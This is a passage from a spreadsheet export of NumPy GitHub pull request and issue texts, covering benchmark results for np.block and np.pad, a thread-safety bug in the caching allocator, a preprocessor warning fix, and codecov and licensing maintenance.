+        41.9±1μs       72.8±0.5μs     1.74  bench_shape_base.Block2D.time_block2d((32, 32), 'uint32', (4, 4))_x000D_
+        46.0±1μs         79.8±2μs     1.73  bench_shape_base.Block2D.time_block2d((128, 128), 'uint16', (4, 4))_x000D_
+      18.2±0.3μs       31.4±0.7μs     1.72  bench_shape_base.Block2D.time_block2d((128, 128), 'uint8', (2, 2))_x000D_
+      44.1±0.9μs       75.1±0.8μs     1.70  bench_shape_base.Block2D.time_block2d((128, 128), 'uint8', (4, 4))_x000D_
+        45.1±1μs         75.7±2μs     1.68  bench_shape_base.Block2D.time_block2d((64, 64), 'uint64', (4, 4))_x000D_
+        44.0±1μs         73.4±2μs     1.67  bench_shape_base.Block2D.time_block2d((64, 64), 'uint8', (4, 4))_x000D_
+      49.4±0.3μs       79.3±0.4μs     1.60  bench_shape_base.Block2D.time_block2d((256, 256), 'uint8', (4, 4))_x000D_
+      20.6±0.4μs       32.9±0.4μs     1.60  bench_shape_base.Block2D.time_block2d((128, 128), 'uint16', (2, 2))_x000D_
+      19.7±0.5μs       31.4±0.2μs     1.59  bench_shape_base.Block2D.time_block2d((64, 64), 'uint64', (2, 2))_x000D_
+        50.0±2μs         78.9±3μs     1.58  bench_shape_base.Block2D.time_block2d((128, 128), 'uint32', (4, 4))_x000D_
+      54.3±0.2μs         81.4±1μs     1.50  bench_shape_base.Block2D.time_block2d((128, 128), 'uint64', (4, 4))_x000D_
+      23.5±0.6μs         34.6±1μs     1.47  bench_shape_base.Block2D.time_block2d((128, 128), 'uint32', (2, 2))_x000D_
+        57.8±1μs         85.0±2μs     1.47  bench_shape_base.Block2D.time_block2d((256, 256), 'uint16', (4, 4))_x000D_
+      24.5±0.7μs       35.4±0.4μs     1.45  bench_shape_base.Block2D.time_block2d((256, 256), 'uint8', (2, 2))_x000D_
+      28.3±0.3μs         38.4±1μs     1.36  bench_shape_base.Block2D.time_block2d((128, 128), 'uint64', (2, 2))_x000D_
+      29.8±0.2μs         40.2±1μs     1.35  bench_shape_base.Block2D.time_block2d((256, 256), 'uint16', (2, 2))_x000D_
-       175±200μs          150±4μs     0.85  bench_shape_base.Block2D.time_block2d((1024, 1024), 'uint8', (4, 4))_x000D_
-      72.0±100μs       59.6±0.8μs     0.83  bench_shape_base.Block2D.time_block2d((512, 512), 'uint16', (2, 2))_x000D_
-      70.8±100μs       56.9±0.1μs     0.80  bench_shape_base.Block2D.time_block2d((256, 256), 'uint64', (2, 2))_x000D_
-       167±200μs          133±1μs     0.80  bench_shape_base.Block2D.time_block2d((512, 512), 'uint32', (4, 4))_x000D_
-       132±200μs         89.4±3μs     0.68  bench_shape_base.Block2D.time_block2d((1024, 1024), 'uint8', (2, 2))_x000D_
-       131±200μs       82.4±0.8μs     0.63  bench_shape_base.Block2D.time_block2d((512, 512), 'uint32', (2, 2))_x000D_
-       377±500μs        191±0.8μs     0.51  bench_shape_base.Block2D.time_block2d((512, 512), 'uint64', (4, 4))_x000D_
-       403±500μs          203±4μs     0.51  bench_shape_base.Block2D.time_block2d((1024, 1024), 'uint16', (4, 4))_x000D_
-      1.20±0.8ms         472±20μs     0.39  bench_shape_base.Block2D.time_block2d((1024, 1024), 'uint32', (4, 4))_x000D_
-        6.14±2ms         985±20μs     0.16  bench_shape_base.Block2D.time_block2d((1024, 1024), 'uint64', (4, 4))_x000D_
-        6.28±2ms         983±50μs     0.16  bench_shape_base.Block2D.time_block2d((1024, 1024), 'uint64', (2, 2))_x000D_
-        2.94±1ms         360±20μs     0.12  bench_shape_base.Block2D.time_block2d((1024, 1024), 'uint32', (2, 2))_x000D_
-      1.27±0.5ms          146±3μs     0.12  bench_shape_base.Block2D.time_block2d((1024, 1024), 'uint16', (2, 2))_x000D_
-      1.32±0.5ms          126±4μs     0.10  bench_shape_base.Block2D.time_block2d((512, 512), 'uint64', (2, 2))_x000D_
```_x000D_
&lt;/details&gt;_x000D_
_x000D_
## A few small micro optimizations_x000D_
_x000D_
This PR builds on-top of pretty optimized code already in numpy. Getting the performance close hard/impossible._x000D_
_x000D_
List comprehensions are really expensive. Unfortunately, blocking allows for really fancy block shapes, which means that we cant do much but to use them in python._x000D_
_x000D_
A few things can be optimized:_x000D_
_x000D_
1. Generators are slow. Thanks @eric-wieser for teaching me about that._x000D_
2. Empty lists are falsy. You can use this to test for unlikely cases using list comprehensions._x000D_
3. Creating tuples is expensive. Create them once, reuse them._x000D_
_x000D_
I'm unsure how these optimizations affect the performance in PyPy _x000D_
_x000D_
# 3D results:_x000D_
For large arrays, the benchmark https://github.com/numpy/numpy/pull/11965 shows that there is now little room to improve compared to a straight concatenate operation. This is really expected since here we are probably copying the arrays more than the cost it takes to generate the slices._x000D_
_x000D_
&lt;details&gt;_x000D_
&lt;summary&gt; benchmarks &lt;/summary&gt;_x000D_
The benchmarks show results for a final array of size `5 n`^3. Therefore, for n=10, the final array has 125,000 elements, each 8 bytes (int 64), so close to 1MB. `n=100` is closer to 1GB_x000D_
_x000D_
New results_x000D_
```_x000D_
===== ========== =============_x000D_
--              mode          _x000D_
----- ------------------------_x000D_
  n     block     concatenate _x000D_
===== ========== =============_x000D_
  1    74.0±2μs    2.03±0.1μs _x000D_
  10   150±6μs      37.6±1μs  _x000D_
 100   366±7ms      393±10ms  _x000D_
===== ========== =============_x000D_
```_x000D_
_x000D_
(I'm pretty convinced that the difference in time here between block and concatenate for n=100 is artificial, though not sure how to prove it.)_x000D_
_x000D_
Improvement compared to the old results_x000D_
_x000D_
```_x000D_
asv continuous -E conda:3.6 -b Block.time_3d master block_single_concatenate_call _x000D_
```_x000D_
```_x000D_
       before           after         ratio_x000D_
     [b5f56572]       [a2b4b356]_x000D_
     &lt;master&gt;         &lt;block_single_concatenate_call&gt;_x000D_
+      40.7±0.2μs         74.0±2μs     1.82  bench_shape_base.Block.time_3d(1, 'block')_x000D_
-      1.10±0.02s          366±7ms     0.33  bench_shape_base.Block.time_3d(100, 'block')_x000D_
-        681±20μs          150±6μs     0.22  bench_shape_base.Block.time_3d(10, 'block')_x000D_
```_x000D_
_x000D_
&lt;/details&gt;_x000D_
_x000D_
# Extensions_x000D_
## Unblocking_x000D_
@eric-wieser discussed the possibility of using this algorithm to `unblock` arrays. This is rather straightforward to implement once we lock down the implementation. Details are in the comments below_x000D_
_x000D_
## User friendly options_x000D_
Finally, this probably lends itself well to offering options like `order`, which would allow one to choose the order of the final array, or even to specify the array that they want to provide through an `out` parameter._x000D_
_x000D_
_x000D_
Closures are avoided entirely, so I  think that gh-10620 is not an issue.</t>
  </si>
  <si>
    <t>MAINT: Block algorithm with a single copy per call to `block`</t>
  </si>
  <si>
    <t>`PyArray_AdaptFlexibleDType` does not return an error status. It seems the third argument, `flex_type` is set to `NULL` if an error occurs, but the value is not checked after a call to the function. Apparently our test suite does not trigger errors in the function. We should_x000D_
- return a value from the function to indicate an error occurred_x000D_
- check the value at all calls to the function_x000D_
- devise tests that make the function fail, preferably in a way that requires the checks in order to prevent incorrect results or crashes_x000D_
- make sure we exit the function on errors, for instance from the call to `PyArray_GetArrayParamsFromObject`.</t>
  </si>
  <si>
    <t>BUG: errors and PyArray_AdaptFlexibleDType</t>
  </si>
  <si>
    <t>Suggested in https://github.com/numpy/numpy/pull/11358#discussion_r217902060._x000D_
_x000D_
This rewrite joins the previous functions `_normalize_shape` and `_validate_length` as an intro to larger changes suggested in gh-11126. This function accelerates the benchmarks for `np.pad` by a factor of_x000D_
0.57 to 0.90._x000D_
_x000D_
cc @eric-wieser _x000D_
_x000D_
&lt;details&gt;_x000D_
  &lt;summary&gt;Benchmarks&lt;/summary&gt;_x000D_
_x000D_
```_x000D_
$ asv continuous -E conda:3.6 -b Pad master pad-as-pairs_x000D_
       before           after         ratio_x000D_
     [88c01b8a]       [3a6182a]_x000D_
     &lt;master&gt;         &lt;pad-as-pairs&gt;_x000D_
-         134±4μs          120±3μs     0.90  bench_lib.Pad.time_pad((10, 100), 1, 'mean')_x000D_
-      73.7±0.4μs         63.9±2μs     0.87  bench_lib.Pad.time_pad((10, 10, 10), 1, 'edge')_x000D_
-         102±2μs         87.9±3μs     0.86  bench_lib.Pad.time_pad((10, 10, 10), 3, 'constant')_x000D_
-        88.4±2μs         74.0±3μs     0.84  bench_lib.Pad.time_pad((10, 10, 10), 1, 'constant')_x000D_
-        145±10μs          121±3μs     0.84  bench_lib.Pad.time_pad((10, 100), 3, 'mean')_x000D_
-        57.2±2μs         47.7±2μs     0.83  bench_lib.Pad.time_pad((10, 10, 10), 3, 'wrap')_x000D_
-         116±7μs         96.4±5μs     0.83  bench_lib.Pad.time_pad((10, 100), (0, 5), 'linear_ramp')_x000D_
-      54.4±0.7μs         45.1±1μs     0.83  bench_lib.Pad.time_pad((10, 10, 10), 1, 'reflect')_x000D_
-        81.1±2μs         67.1±2μs     0.83  bench_lib.Pad.time_pad((1000,), 1, 'mean')_x000D_
-        42.3±1μs         34.0±2μs     0.80  bench_lib.Pad.time_pad((10, 100), 1, 'reflect')_x000D_
-      29.1±0.9μs         23.4±1μs     0.80  bench_lib.Pad.time_pad((1000,), 3, 'wrap')_x000D_
-        92.1±2μs         73.6±5μs     0.80  bench_lib.Pad.time_pad((10, 100), (0, 5), 'mean')_x000D_
-        64.5±2μs       50.4±0.9μs     0.78  bench_lib.Pad.time_pad((10, 10, 10), (0, 5), 'reflect')_x000D_
-      38.3±0.6μs         29.7±1μs     0.78  bench_lib.Pad.time_pad((10, 100), 3, 'wrap')_x000D_
-        70.6±5μs         54.2±1μs     0.77  bench_lib.Pad.time_pad((10, 10, 10), 3, 'reflect')_x000D_
-        70.1±5μs         53.6±2μs     0.76  bench_lib.Pad.time_pad((10, 100), 3, 'constant')_x000D_
-        36.5±2μs       27.5±0.6μs     0.75  bench_lib.Pad.time_pad((1000,), 1, 'edge')_x000D_
-        32.7±1μs       24.6±0.9μs     0.75  bench_lib.Pad.time_pad((1000,), 1, 'reflect')_x000D_
-        69.5±9μs         51.8±2μs     0.75  bench_lib.Pad.time_pad((10, 100), 1, 'constant')_x000D_
-      46.1±0.9μs         34.3±2μs     0.74  bench_lib.Pad.time_pad((10, 100), (0, 5), 'reflect')_x000D_
-        36.7±2μs       27.3±0.5μs     0.74  bench_lib.Pad.time_pad((1000,), 3, 'edge')_x000D_
-      29.2±0.4μs         21.5±1μs     0.74  bench_lib.Pad.time_pad((1000,), 1, 'wrap')_x000D_
-        72.4±2μs         53.1±5μs     0.73  bench_lib.Pad.time_pad((1000,), (0, 5), 'linear_ramp')_x000D_
-      32.3±0.8μs       23.6±0.6μs     0.73  bench_lib.Pad.time_pad((1000,), 3, 'reflect')_x000D_
-        57.5±3μs       41.9±0.6μs     0.73  bench_lib.Pad.time_pad((10, 10, 10), (0, 5), 'wrap')_x000D_
-      48.7±0.8μs       34.5±0.8μs     0.71  bench_lib.Pad.time_pad((1000,), 1, 'constant')_x000D_
-        77.9±6μs         54.5±2μs     0.70  bench_lib.Pad.time_pad((10, 10, 10), (0, 5), 'constant')_x000D_
-        70.5±4μs       48.7±0.8μs     0.69  bench_lib.Pad.time_pad((10, 10, 10), (0, 5), 'edge')_x000D_
-      42.5±0.6μs       29.3±0.8μs     0.69  bench_lib.Pad.time_pad((10, 100), (0, 5), 'wrap')_x000D_
-        44.5±1μs         30.4±1μs     0.68  bench_lib.Pad.time_pad((10, 100), (0, 5), 'edge')_x000D_
-      48.8±0.6μs       33.2±0.5μs     0.68  bench_lib.Pad.time_pad((1000,), 3, 'constant')_x000D_
-      35.5±0.7μs       24.0±0.8μs     0.68  bench_lib.Pad.time_pad((1000,), (0, 5), 'reflect')_x000D_
-      32.4±0.6μs       20.1±0.5μs     0.62  bench_lib.Pad.time_pad((1000,), (0, 5), 'wrap')_x000D_
-        33.2±1μs       20.5±0.6μs     0.62  bench_lib.Pad.time_pad((1000,), (0, 5), 'edge')_x000D_
-        60.0±3μs       36.3±0.9μs     0.61  bench_lib.Pad.time_pad((10, 100), (0, 5), 'constant')_x000D_
-      45.1±0.5μs       25.7±0.7μs     0.57  bench_lib.Pad.time_pad((1000,), (0, 5), 'constant')_x000D_
_x000D_
SOME BENCHMARKS HAVE CHANGED SIGNIFICANTLY._x000D_
```_x000D_
_x000D_
&lt;/details&gt;</t>
  </si>
  <si>
    <t>MAINT: Rewrite shape normalization in pad function</t>
  </si>
  <si>
    <t>Enhances the existing block3D benchmark to show the performance difference between block and direct memory of each individual blocks._x000D_
_x000D_
The way the test is written, a secondary plot on the same graph showing block should show `copy` allowing us to easily compare the two._x000D_
_x000D_
This should help motivate the design for an improved blocking algorithm for case where users are blocking 3D cubes._x000D_
_x000D_
```_x000D_
===== ============ =============_x000D_
--               mode           _x000D_
----- --------------------------_x000D_
n      block          copy    _x000D_
===== ============ =============_x000D_
1    39.9±0.1μs   3.44±0.02μs _x000D_
10   209±200μs     38.6±0.6μs _x000D_
100   1.06±0.03s     390±6ms   _x000D_
===== ============ =============_x000D_
```</t>
  </si>
  <si>
    <t>BENCH: Add a benchmark comparing block to copy in the 3D case</t>
  </si>
  <si>
    <t>['28 - Benchmark', 'component: benchmarks']</t>
  </si>
  <si>
    <t xml:space="preserve">Added an argument `maxlines` on `numpy.loadtxt` to limit the maximum lines of the content to be read. This would be useful in handling large files._x000D_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</si>
  <si>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maximum lines of content to be read from numpy.loadtxt</t>
  </si>
  <si>
    <t>Extracted from #11358 + the addition of an `xfail` marker.</t>
  </si>
  <si>
    <t>TST: Add more tests for np.pad</t>
  </si>
  <si>
    <t>This PR ensures that the that simulate the data that will be processed are actually allocated in *physical* memory._x000D_
_x000D_
calls to np.empty (malloc) or np.zero (calloc) can often return without actually creating physical memory. Page faults would therefore happen in real time._x000D_
Any call that explicitely traverses the memory will cause the OS to finallly allocate the memory._x000D_
_x000D_
`np.ones` copies `1` to the memory and therefore cause all the pagefaults to happen during the setup phase._x000D_
_x000D_
explicitly  filling or copying a whole array is an other good way to ensure the benchmark doesn't page fault on the *input* array during the timed portion._x000D_
_x000D_
Relates to PR #11358</t>
  </si>
  <si>
    <t>MAINT: Explicitely cause pagefaults to happen before starting the benchmarks</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: benchmarks']</t>
  </si>
  <si>
    <t xml:space="preserve">On distributions with `/sys/kernel/mm/transparent_hugepage/enabled` set to_x000D_
madvise we do not automatically get our memory backed by huge pages._x000D_
Explicitly madvise these regions so they can use larger pages._x000D_
_x000D_
This improves performance of the common large array allocation/free_x000D_
cycle in numpy as page fault overhead is reduced._x000D_
_x000D_
    asv continuous -E virtualenv:3.6 --bench bench_io.Copy HEAD^ HEAD_x000D_
_x000D_
      2.64±0.3ms      1.99±0.06ms     0.75  bench_io.Copy.time_memcpy_large_out_of_place('float32')_x000D_
      5.51±0.2ms       3.74±0.3ms     0.68  bench_io.Copy.time_memcpy_large_out_of_place('float64')_x000D_
     4.76±0.02μs      3.02±0.04μs     0.63  bench_io.Copy.time_cont_assign('float32')_x000D_
      5.55±0.1ms       3.31±0.1ms     0.60  bench_io.Copy.time_memcpy_large_out_of_place('complex64')_x000D_
      11.3±0.2ms       6.26±0.2ms     0.56  bench_io.Copy.time_memcpy_large_out_of_place('complex128')_x000D_
_x000D_
Closes gh-11919_x000D_
</t>
  </si>
  <si>
    <t>ENH: mark that large allocations can use huge pages</t>
  </si>
  <si>
    <t>This might make it easier to make small refactors towards #11126 - this aims to be a much lower surface-area change._x000D_
_x000D_
This change should affect neither performance nor result.</t>
  </si>
  <si>
    <t>MAINT: Move _do_append and _do_prepend out of the functions to generate padding values</t>
  </si>
  <si>
    <t>['03 - Maintenance', '50 - Duplicate']</t>
  </si>
  <si>
    <t xml:space="preserve">Kept only as reference, while https://github.com/numpy/numpy/pull/11358 is being developed._x000D_
_x000D_
This is a start at addressing #11126_x000D_
_x000D_
Padding was causing the array to be copied `2*arr.ndim` times which can be huge for large arrays._x000D_
_x000D_
I did not comment my helper functions. _x000D_
They are 1-2 line long._x000D_
If numpy requires those to be commented then please let me know._x000D_
_x000D_
Modes finished:_x000D_
  * [x] constant_x000D_
  * [x] edge_x000D_
  * [x] linear_ramp_x000D_
  * [x] maximum_x000D_
  * [x] mean_x000D_
  * [x] median_x000D_
  * [x] minimum_x000D_
  * [ ] reflect_x000D_
  * [ ] symmetric_x000D_
  * [ ] wrap_x000D_
_x000D_
I'm glad to pass on the torch._x000D_
_x000D_
Before_x000D_
```_x000D_
================== ========== ========== ============= ========== ========== ========== ========== ========== =========== ==========_x000D_
--                                                                        mode                                                      _x000D_
------------------ -----------------------------------------------------------------------------------------------------------------_x000D_
    shape         constant     edge     linear_ramp   maximum      mean      median    minimum    reflect    symmetric     wrap   _x000D_
================== ========== ========== ============= ========== ========== ========== ========== ========== =========== ==========_x000D_
   (64, 64)       625±0μs    747±0μs      1.32±0ms    1.03±0ms   1.22±0ms   2.51±0ms   1.41±0ms   506±0μs     617±0μs    618±0μs  _x000D_
  (256, 256)      2.57±0ms   3.02±0ms     4.44±0ms    4.56±0ms   4.50±0ms   9.95±0ms   4.61±0ms   2.69±0ms    2.71±0ms   2.59±0ms _x000D_
  (512, 512)      8.38±0ms   6.59±0ms     7.64±0ms    9.02±0ms   7.15±0ms   19.3±0ms   11.4±0ms   8.07±0ms    6.77±0ms   8.64±0ms _x000D_
 (10, 10, 10)     1.31±0ms   1.02±0ms     2.56±0ms    883±0μs    2.09±0ms   3.74±0ms   1.81±0ms   1.28±0ms    892±0μs    853±0μs  _x000D_
 (10, 64, 64)     5.88±0ms   8.69±0ms     12.2±0ms    9.89±0ms   6.38±0ms   13.3±0ms   10.8±0ms   5.91±0ms    5.16±0ms   4.39±0ms _x000D_
(50, 1024, 1024)   1.88±0s    1.85±0s      2.20±0s     2.23±0s    2.15±0s    5.63±0s    2.24±0s    1.11±0s     1.10±0s    1.11±0s  _x000D_
================== ========== ========== ============= ========== ========== ========== ========== ========== =========== ==========_x000D_
```_x000D_
_x000D_
After (only constant and edge were implemented)_x000D_
```_x000D_
_x000D_
_x000D_
================== ========== ========== ============= ========== ========== ========== ========== ========== =========== ==========_x000D_
--                                                                        mode                                                      _x000D_
------------------ -----------------------------------------------------------------------------------------------------------------_x000D_
    shape         constant     edge     linear_ramp   maximum      mean      median    minimum    reflect    symmetric     wrap   _x000D_
================== ========== ========== ============= ========== ========== ========== ========== ========== =========== ==========_x000D_
   (64, 64)       840±0μs    825±0μs      916±0μs     962±0μs    858±0μs    2.10±0ms   667±0μs    595±0μs     655±0μs    634±0μs  _x000D_
  (256, 256)      1.94±0ms   1.91±0ms     4.45±0ms    4.57±0ms   4.41±0ms   5.65±0ms   3.16±0ms   2.46±0ms    1.11±0ms   2.57±0ms _x000D_
  (512, 512)      3.00±0ms   4.77±0ms     10.4±0ms    10.4±0ms   9.34±0ms   21.4±0ms   10.6±0ms   6.99±0ms    6.77±0ms   4.52±0ms _x000D_
 (10, 10, 10)     1.10±0ms   1.14±0ms     2.57±0ms    1.83±0ms   1.49±0ms   3.84±0ms   1.83±0ms   1.30±0ms    938±0μs    605±0μs  _x000D_
 (10, 64, 64)     2.66±0ms   3.33±0ms     10.7±0ms    8.38±0ms   7.58±0ms   14.5±0ms   8.83±0ms   5.67±0ms    4.82±0ms   5.01±0ms _x000D_
(50, 1024, 1024)   411±0ms    419±0ms      2.20±0s     2.23±0s    2.15±0s    5.69±0s    2.25±0s    1.12±0s     1.11±0s    1.08±0s  _x000D_
================== ========== ========== ============= ========== ========== ========== ========== ========== =========== ==========_x000D_
_x000D_
```_x000D_
_x000D_
cc @jakirkham </t>
  </si>
  <si>
    <t>MAINT: Make constant and edge mode padding faster.</t>
  </si>
  <si>
    <t>Fixes #11947 _x000D_
_x000D_
Added some comments and ignored CircleCI for coverage reporting purposes as well.</t>
  </si>
  <si>
    <t>TST: codecov.yml improvements</t>
  </si>
  <si>
    <t>When using GCC 4.4.7 on RHEL 6 to compile a C program that embeds Python and includes `numpy/core/include/numpy/npy_common.h`, and the compiler is configured to warn about all questionable constructions (`-Wall`) and warn about undefined identifiers (`-Wundef`), it emits a warning like_x000D_
_x000D_
```_x000D_
/tmp/python-2.7.15/lib/python2.7/site-packages/numpy/core/include/numpy/npy_common.h:17:5: warning: "NPY_INTERNAL_BUILD" is not defined_x000D_
```_x000D_
_x000D_
A minimal C program and compiler invocation to reproduce the warning is_x000D_
_x000D_
```_x000D_
$ cat main.c_x000D_
#include &lt;Python.h&gt;_x000D_
#include &lt;numpy/npy_common.h&gt;_x000D_
_x000D_
int main(void) {_x000D_
  return 0;_x000D_
}_x000D_
$ cc -o -Wall -Wundef \_x000D_
    -I/tmp/python-2.7.15/include/python2.7 \_x000D_
    -I/tmp/python-2.7.15/lib/python2.7/site-packages/numpy/core/include \_x000D_
    main.c_x000D_
```_x000D_
_x000D_
The warning in `npy_common.h` comes from_x000D_
_x000D_
```_x000D_
#if NPY_INTERNAL_BUILD_x000D_
#ifndef NPY_INLINE_MATH_x000D_
#define NPY_INLINE_MATH 1_x000D_
#endif_x000D_
#endif_x000D_
```_x000D_
_x000D_
Eliminate this warning by changing the `#if` expression to test `NPY_INTERNAL_BUILD` only if it is defined.  (This preserves the original behavior because in the original, when `NPY_INTERNAL_BUILD` is undefined, the preprocessor treats it as `0` (false).)</t>
  </si>
  <si>
    <t>MAINT: test NPY_INTERNAL_BUILD only if defined</t>
  </si>
  <si>
    <t>This takes most of the parts of #11175 which are updates to existing tests / documentation rather than things related to the new feature._x000D_
_x000D_
It's useful to be able to see from the git history which parts of the diff are due to the feature being added, and which parts were just holes in the original documentation / tests</t>
  </si>
  <si>
    <t>MAINT: Extract tangential improvements made in #11175</t>
  </si>
  <si>
    <t>More steps towards #10151. This patch should have no change at all.</t>
  </si>
  <si>
    <t>MAINT: Small tidy-ups to `np.core._dtype`</t>
  </si>
  <si>
    <t xml:space="preserve">Closes #11945_x000D_
</t>
  </si>
  <si>
    <t>DEP: finish making all comparisons to NaT false</t>
  </si>
  <si>
    <t>It may be helpful to see codecov reports even if a Travis matrix entry fails for some reason (needs a restart or whatever). _x000D_
_x000D_
By default, `require_ci_to_pass: yes`, but i.e., SciPy has set that to `no` in their config--any objections to activating that so that we don't necessarily have to waste test cycles to see the report for failures out of our control?_x000D_
_x000D_
I've noticed this a few times now -- most recently in #11937.</t>
  </si>
  <si>
    <t>TST: codecov report cancels</t>
  </si>
  <si>
    <t xml:space="preserve">Per mailing list discussion in:_x000D_
https://mail.python.org/pipermail/numpy-discussion/2018-August/078493.html_x000D_
</t>
  </si>
  <si>
    <t>DOC: Add warning/clarification about backwards compat in NEP-18</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
The use of the caching memory allocator in numpy with multiple threads seems to result in some buggy behavior. It is not clear if this is due to the cacheing allocator methods being invoked from places where GIL is not held or due to other issues. When we upgraded from numpy 1.13.3 to 1.14.0 we noticed these issues, likely due to PRs such as https://github.com/numpy/numpy/pull/8920._x000D_
We also identified such commits as potentially problematic:_x000D_
_x000D_
```_x000D_
git diff 1108252...5a08e209863038b411bc506893093c5a4b8377c9 --stat_x000D_
 doc/source/reference/c-api.array.rst         |  8 ++++----_x000D_
 numpy/core/src/multiarray/alloc.h            | 12 ++++++++++++_x000D_
 numpy/core/src/multiarray/arrayobject.c      |  8 ++++----_x000D_
 numpy/core/src/multiarray/arraytypes.c.src   |  8 ++++----_x000D_
 numpy/core/src/multiarray/compiled_base.c    |  9 +++++----_x000D_
 numpy/core/src/multiarray/conversion_utils.c |  5 +++--_x000D_
 numpy/core/src/multiarray/descriptor.c       | 21 +++++++++++----------_x000D_
 numpy/core/src/multiarray/dtype_transfer.c   | 23 ++++++++++++-----------_x000D_
 numpy/core/src/multiarray/getset.c           | 11 ++++++-----_x000D_
 numpy/core/src/multiarray/item_selection.c   | 31 ++++++++++++++++---------------_x000D_
 numpy/core/src/multiarray/methods.c          | 17 +++++++++--------_x000D_
 numpy/core/src/multiarray/multiarraymodule.c | 12 ++++++------_x000D_
 numpy/core/src/multiarray/nditer_pywrap.c    |  9 +++++----_x000D_
 numpy/core/src/multiarray/scalartypes.c.src  | 18 ++++++++----------_x000D_
 numpy/core/src/multiarray/shape.c            |  3 ++-_x000D_
 15 files changed, 107 insertions(+), 88 deletions(-)_x000D_
```_x000D_
_x000D_
This issue seems to be still be present in the latest master._x000D_
_x000D_
For local testing we were able to resolve issues by making the allocator objects into Thread Local Storage object by doing:_x000D_
_x000D_
```_x000D_
$ git diff_x000D_
diff --git a/numpy/core/src/multiarray/alloc.c b/numpy/core/src/multiarray/alloc.c_x000D_
index f8305d1..fa6b3c0 100644_x000D_
--- a/numpy/core/src/multiarray/alloc.c_x000D_
+++ b/numpy/core/src/multiarray/alloc.c_x000D_
@@ -32,8 +32,8 @@ typedef struct {_x000D_
     npy_uintp available; /* number of cached pointers */_x000D_
     void * ptrs[NCACHE];_x000D_
 } cache_bucket;_x000D_
-static cache_bucket datacache[NBUCKETS];_x000D_
-static cache_bucket dimcache[NBUCKETS_DIM];_x000D_
+static __thread cache_bucket datacache[NBUCKETS];_x000D_
+static __thread cache_bucket dimcache[NBUCKETS_DIM];_x000D_
 _x000D_
 /*_x000D_
```_x000D_
 _x000D_
 Although it is doubtful that this solution would be viable for all supported platforms as __thread may not be supported for some of them. This was rather to verify that the allocator cache was improperly accessed across threads._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
The following attachment contains what is needed to reproduce this problem. Unfortunately it does not occur every time, so it may need to be run several times before it occurs. The number of cores or speed of the machine used may also make a difference in how easy it is to reproduce. When it does occur, it will be either a segfault or an IndexError._x000D_
_x000D_
[gh8920.tar.gz](https://github.com/numpy/numpy/files/2382805/gh8920-14092018.tar.gz)_x000D_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_x000D_
</t>
  </si>
  <si>
    <t>Occasional segfault with cacheing allocator and multiple threads</t>
  </si>
  <si>
    <t>['00 - Bug', 'priority: high']</t>
  </si>
  <si>
    <t xml:space="preserve">Presently, `einsum` with `optimize=True` iterates over a `set` of operand-indices when populating the axes of `tensordot`. Changing the ordering in which the axes are supplied to `tensordot` can lead to [major fluctuations](https://github.com/numpy/numpy/issues/11940) in performance, thus it is important to ensure that `einsum` dispatches `tensordot` in a deterministic way.  _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">BUG: Ensure einsum(optimize=True) dispatches tensordot deterministically </t>
  </si>
  <si>
    <t>['00 - Bug', '25 - WIP', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">Related to #11824 and in the spirit of changes in #11900 _x000D_
_x000D_
I almost didn't notice that a `string` object was being fed into `check_output`, and the tests were impervious so a bit *scary*. I've added a detailed comment to hopefully assist review._x000D_
</t>
  </si>
  <si>
    <t>MAINT: remove exec_command() from f2py init</t>
  </si>
  <si>
    <t xml:space="preserve">Related to #11824 and the general spirit of changes in #11900._x000D_
_x000D_
A little tricky here because some of the more obscure `exec_command()` args were exercised by `get_output()`. Also, note that `get_output()`, which uses those more obscure args, has been deprecated for 2 years, with a `RemoveMe` comment that claims to be 10 years old. Of course, this is distutils so that still doesn't mean it is safe to remove._x000D_
</t>
  </si>
  <si>
    <t>MAINT: remove usage of exec_command in config.py</t>
  </si>
  <si>
    <t>Reverts numpy/numpy#11693_x000D_
_x000D_
I want to do another round of edits before finalizing this</t>
  </si>
  <si>
    <t>NEP: Revert "NEP: Mark NEP 18 as accepted"</t>
  </si>
  <si>
    <t xml:space="preserve">Following pytest migration https://github.com/numpy/numpy/issues/10856 there are unit tests that used to call `unittest.TestCase.fail` and now will produce a misleading error message on failure because the `fail` method no longer exists (test classes just inherit from `object`)._x000D_
_x000D_
This fixes this issue, by raising an exception on failure explicitly. </t>
  </si>
  <si>
    <t>TST: Fix unit tests that used to call unittest.TestCase.fail</t>
  </si>
  <si>
    <t>This shares a lot of code with part of `dtype.__repr__`, and it's helpful to get it all in one place._x000D_
_x000D_
This fixes possible but unlikely segfaults if `PyUString_ConcatAndDel` fails._x000D_
_x000D_
Follows up on some remarks left in #10602, hopefully makes it easier to solve problems in #10151.</t>
  </si>
  <si>
    <t>MAINT: Move `np.dtype.name.__get__` to python</t>
  </si>
  <si>
    <t xml:space="preserve">This is just an experiment that allows adding two unicode type arrays and getting an element-wise concatenated result without going through `numpy.core.defchararray.add()`._x000D_
_x000D_
So, `np.array(['a', 'b']) + np.array(['c', 'd']) -&gt; np.array(['ac', 'bd'])`_x000D_
_x000D_
The new unit test added does pass, but some other tests fail pretty badly for now._x000D_
_x000D_
I added some detailed comments to see if others think I'm misunderstanding here. Not suggesting we should do this, but more looking for feedback on what ideas I might have wrong re: making "string-type" handling better (which is on our roadmap). </t>
  </si>
  <si>
    <t>WIP / experiment: enable native unicode arr concatenation</t>
  </si>
  <si>
    <t>['25 - WIP', 'component: numpy.dtype']</t>
  </si>
  <si>
    <t xml:space="preserve">In base LICENSE.txt under scipy-sphinx-theme, LICENSE.txt path is wrong._x000D_
_x000D_
Point to right path:_x000D_
doc/scipy-sphinx-theme/LICENSE.txt_x000D_
instead of:_x000D_
doc/sphinxext/LICENSE.txt_x000D_
_x000D_
Signed-off-by: Giulio Benetti &lt;giulio.benetti@micronovasrl.com&gt;_x000D_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</si>
  <si>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fix scipy-sphinx-theme license path</t>
  </si>
  <si>
    <t xml:space="preserve">In Release https://github.com/numpy/numpy/releases/download/v1.15.1/numpy-1.15.1.tar.gz_x000D_
license for sub libraries are not present, they are only listed on the base LICENSE.txt file._x000D_
Is it possible to add them in the next release?_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>License files missing in Releases</t>
  </si>
  <si>
